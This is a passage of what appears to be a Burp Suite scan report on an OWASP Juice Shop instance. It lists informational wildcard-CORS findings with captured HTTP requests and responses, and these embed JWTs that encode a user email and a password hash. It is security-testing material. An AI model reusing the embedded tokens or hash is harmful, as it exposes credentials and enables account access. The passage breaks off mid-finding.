    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 43
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"ProductId":6,"BasketId":"4","quantity":1}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 156
    ETag: W/"9c-9cgpjd81EZEnsUVUx5UcuQ"
    Date: Sun, 15 Jan 2017 21:01:16 GMT
    Connection: close

    {"status":"success","data":{"ProductId":6,"BasketId":"4","quantity":1,"id":6,"updatedAt":"2017-01-15T21:01:15.000Z","createdAt":"2017-01-15T21:01:15.000Z"}}
    15.3. http://192.168.61.143:3000/api/BasketItems/7

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/7

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request: the response carries Access-Control-Allow-Origin: * and no Access-Control-Allow-Credentials header. Browsers refuse to expose a response to a credentialed cross-origin request when the allowed origin is the wildcard, so what a page on any other origin can read is the unauthenticated view of this resource.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk, because a page on any origin can read the response through the browser of a user inside the trusted network.

    Burp flags the absent Vary: Origin header as a cache poisoning risk. That concern applies when the allowed origin is reflected from the request; here the header is a fixed * that does not depend on the request's Origin, so a cached copy of this response is no more permissive than a fresh one.

    Request 1

    GET /api/BasketItems/7 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 154
    ETag: W/"9a-1C6ERKtHJRgLYI4755CP0A"
    Date: Sun, 15 Jan 2017 21:01:25 GMT
    Connection: close

    {"status":"success","data":{"id":7,"quantity":1,"createdAt":"2017-01-15T21:01:20.000Z","updatedAt":"2017-01-15T21:01:20.000Z","ProductId":8,"BasketId":4}}
    15.4. http://192.168.61.143:3000/api/BasketItems/8

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/8

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request: the response carries Access-Control-Allow-Origin: * and no Access-Control-Allow-Credentials header. Browsers refuse to expose a response to a credentialed cross-origin request when the allowed origin is the wildcard, so what a page on any other origin can read is the unauthenticated view of this resource.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk, because a page on any origin can read the response through the browser of a user inside the trusted network.

    Burp flags the absent Vary: Origin header as a cache poisoning risk. That concern applies when the allowed origin is reflected from the request; here the header is a fixed * that does not depend on the request's Origin, so a cached copy of this response is no more permissive than a fresh one.

    Request 1

    GET /api/BasketItems/8 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 154
    ETag: W/"9a-wTHEuTLtpNGewrPZXacyCQ"
    Date: Sun, 15 Jan 2017 21:02:40 GMT
    Connection: close

    {"status":"success","data":{"id":8,"quantity":1,"createdAt":"2017-01-15T21:02:25.000Z","updatedAt":"2017-01-15T21:02:25.000Z","ProductId":2,"BasketId":4}}
    15.5. http://192.168.61.143:3000/api/Complaints/

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Complaints/

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request: the response carries Access-Control-Allow-Origin: * and no Access-Control-Allow-Credentials header. Browsers refuse to expose a response to a credentialed cross-origin request when the allowed origin is the wildcard, so what a page on any other origin can read is the unauthenticated view of this resource.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk, because a page on any origin can read the response through the browser of a user inside the trusted network.

    Burp flags the absent Vary: Origin header as a cache poisoning risk. That concern applies when the allowed origin is reflected from the request; here the header is a fixed * that does not depend on the request's Origin, so a cached copy of this response is no more permissive than a fresh one.

    Request 1

    POST /api/Complaints/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 36
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"message":"wewewewewew"}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 149
    ETag: W/"95-1QAsyuWrCA/wpIY6CpA3wg"
    Date: Sun, 15 Jan 2017 21:04:58 GMT
    Connection: close

    {"status":"success","data":{"UserId":7,"message":"wewewewewew","id":1,"updatedAt":"2017-01-15T21:04:58.000Z","createdAt":"2017-01-15T21:04:58.000Z"}}
    15.6. http://192.168.61.143:3000/api/Feedbacks/

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request: the response carries Access-Control-Allow-Origin: * and no Access-Control-Allow-Credentials header. Browsers refuse to expose a response to a credentialed cross-origin request when the allowed origin is the wildcard, so what a page on any other origin can read is the unauthenticated view of this resource.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk, because a page on any origin can read the response through the browser of a user inside the trusted network.

    Burp flags the absent Vary: Origin header as a cache poisoning risk. That concern applies when the allowed origin is reflected from the request; here the header is a fixed * that does not depend on the request's Origin, so a cached copy of this response is no more permissive than a fresh one.

    Request 1

    GET /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close
    If-None-Match: W/"516-ayfzPIPZ80YUQttXHSFV3w"

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    ETag: W/"516-ayfzPIPZ80YUQttXHSFV3w"
    Date: Sun, 15 Jan 2017 21:04:26 GMT
    Connection: close

    15.7. http://192.168.61.143:3000/api/Products/1

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/1

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request: the response carries Access-Control-Allow-Origin: * and no Access-Control-Allow-Credentials header. Browsers refuse to expose a response to a credentialed cross-origin request when the allowed origin is the wildcard, so what a page on any other origin can read is the unauthenticated view of this resource.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk, because a page on any origin can read the response through the browser of a user inside the trusted network.

    Burp flags the absent Vary: Origin header as a cache poisoning risk. That concern applies when the allowed origin is reflected from the request; here the header is a fixed * that does not depend on the request's Origin, so a cached copy of this response is no more permissive than a fresh one.

    Request 1

    GET /api/Products/1?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 238
    ETag: W/"ee-53rCFb8oFsZx9n/J7+mqUA"
    Date: Sun, 15 Jan 2017 21:01:06 GMT
    Connection: close

    {"status":"success","data":{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classic.","price":1.99,"image":"apple_juice.jpg","createdAt":"2017-01-15T20:58:05.000Z","updatedAt":"2017-0
    ...[SNIP]...
    15.8. http://192.168.61.143:3000/api/Products/12

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/12

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request: the response carries Access-Control-Allow-Origin: * and no Access-Control-Allow-Credentials header. Browsers refuse to expose a response to a credentialed cross-origin request when the allowed origin is the wildcard, so what a page on any other origin can read is the unauthenticated view of this resource.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk, because a page on any origin can read the response through the browser of a user inside the trusted network.

    Burp flags the absent Vary: Origin header as a cache poisoning risk. That concern applies when the allowed origin is reflected from the request; here the header is a fixed * that does not depend on the request's Origin, so a cached copy of this response is no more permissive than a fresh one.

    Request 1

    GET /api/Products/12?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    X-User-Email: mike_landeck@hotmail.com
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 274
    ETag: W/"112-4pulhmzFvKNVTiwXKm5JZQ"
    Date: Sun, 15 Jan 2017 21:50:40 GMT
    Connection: close

    {"status":"success","data":{"id":12,"name":"OWASP Juice Shop Hoodie","description":"Mr. Robot-style apparel. But in black. And with logo.","price":49.99,"image":"fan_hoodie.jpg","createdAt":"2017-01-1
    ...[SNIP]...
    15.9. http://192.168.61.143:3000/api/Products/18

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/18

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request: the response carries Access-Control-Allow-Origin: * and no Access-Control-Allow-Credentials header. Browsers refuse to expose a response to a credentialed cross-origin request when the allowed origin is the wildcard, so what a page on any other origin can read is the unauthenticated view of this resource.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk, because a page on any origin can read the response through the browser of a user inside the trusted network.

    Burp flags the absent Vary: Origin header as a cache poisoning risk. That concern applies when the allowed origin is reflected from the request; here the header is a fixed * that does not depend on the request's Origin, so a cached copy of this response is no more permissive than a fresh one.

    Request 1

    GET /api/Products/18?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 295
    ETag: W/"127-PpZkvx2Uf2P7ykEwkJBylQ"
    Date: Sun, 15 Jan 2017 21:01:11 GMT
    Connection: close

    {"status":"success","data":{"id":18,"name":"Fruit Press","description":"Fruits go in. Juice comes out. Pomace you can send back to us for recycling purposes.","price":89.99,"image":"fruit_press.jpg","
    ...[SNIP]...
    15.10. http://192.168.61.143:3000/api/Products/2

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/2

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request: the response carries Access-Control-Allow-Origin: * and no Access-Control-Allow-Credentials header. Browsers refuse to expose a response to a credentialed cross-origin request when the allowed origin is the wildcard, so what a page on any other origin can read is the unauthenticated view of this resource.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk, because a page on any origin can read the response through the browser of a user inside the trusted network.

    Burp flags the absent Vary: Origin header as a cache poisoning risk. That concern applies when the allowed origin is reflected from the request; here the header is a fixed * that does not depend on the request's Origin, so a cached copy of this response is no more permissive than a fresh one.

    Request 1

    GET /api/Products/2?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 268
    ETag: W/"10c-hkD1i8LMM3pl/uHqcFZ3hw"
    Date: Sun, 15 Jan 2017 21:02:22 GMT
    Connection: close

    {"status":"success","data":{"id":2,"name":"Orange Juice (1000ml)","description":"Made from oranges hand-picked by Uncle Dittmeyer.","price":2.99,"image":"orange_juice.jpg","createdAt":"2017-01-15T20:5
    ...[SNIP]...
    15.11. http://192.168.61.143:3000/api/Products/4

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/4

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Products/4?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
